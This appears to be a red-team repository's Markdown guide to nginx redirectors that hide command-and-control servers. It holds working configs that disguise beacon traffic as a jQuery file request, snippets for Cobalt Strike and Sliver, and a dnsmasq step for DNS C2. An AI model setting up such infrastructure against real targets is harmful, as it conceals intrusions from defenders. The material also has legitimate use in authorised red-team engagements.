Hermes Agent
80 lines
1.7 KiB
Markdown
80 lines
1.7 KiB
Markdown
# C2 Redirectors (nginx)
|
|
|
|
## Purpose
|
|
|
|
Redirectors proxy C2 traffic through legitimate-looking infrastructure to hide the actual C2 server.
|
|
|
|
## Setup (nginx on Debian/Ubuntu)
|
|
|
|
```bash
|
|
# Install
|
|
apt install nginx openssl
|
|
|
|
# For HTTPS redirectors, get a cert:
|
|
certbot --nginx -d redirector.example.com
|
|
```
|
|
|
|
## HTTP Redirector Config
|
|
|
|
```nginx
|
|
server {
|
|
listen 80;
|
|
server_name redirector.example.com;
|
|
|
|
location / {
|
|
return 301 https://legitimate-site.com$request_uri;
|
|
}
|
|
}
|
|
|
|
server {
|
|
listen 443 ssl;
|
|
server_name redirector.example.com;
|
|
|
|
ssl_certificate /etc/letsencrypt/live/redirector.example.com/fullchain.pem;
|
|
ssl_certificate_key /etc/letsencrypt/live/redirector.example.com/privkey.pem;
|
|
|
|
location /static {
|
|
proxy_pass https://legitimate-site.com;
|
|
proxy_set_header Host legitimate-site.com;
|
|
}
|
|
|
|
# C2 traffic goes to actual C2
|
|
location /jquery-3.6.0.min.js {
|
|
proxy_pass http://10.0.0.5:8080;
|
|
}
|
|
}
|
|
```
|
|
|
|
## Cobalt Strike Redirector
|
|
|
|
```nginx
|
|
# For Cobalt Strike C2, route traffic based on URI
|
|
location /jquery-3.6.0.min.js {
|
|
proxy_pass http://c2-server:80;
|
|
proxy_set_header Host staging.hoolulu.com;
|
|
}
|
|
```
|
|
|
|
## Sliver Redirector
|
|
|
|
```nginx
|
|
# Sliver uses HTTPS with specific paths
|
|
location /api/v2/status {
|
|
proxy_pass http://sliver-server:443;
|
|
}
|
|
```
|
|
|
|
## DNS Redirector (for DNS C2)
|
|
|
|
```bash
|
|
# Setup DNS with dnsmasq
|
|
echo "A record pointing to your C2 IP" >> /etc/dnsmasq.d/c2.conf
|
|
systemctl restart dnsmasq
|
|
```
|
|
|
|
## Operational Notes
|
|
|
|
- Use CDN domains when possible (CloudFlare, Akamai)
|
|
- Separate redirectors per operation
|
|
- Log everything for attribution if needed
|
|
- Test redirects before engagement |